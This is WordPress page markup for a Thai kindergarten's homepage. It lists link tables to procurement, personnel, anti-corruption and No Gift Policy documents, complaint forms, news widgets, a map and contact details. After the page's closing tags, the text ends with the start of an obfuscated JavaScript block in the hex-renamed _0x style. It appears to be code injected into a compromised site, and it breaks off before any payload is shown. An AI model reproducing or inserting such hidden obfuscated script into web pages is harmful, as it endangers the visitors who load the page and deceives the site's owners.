data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 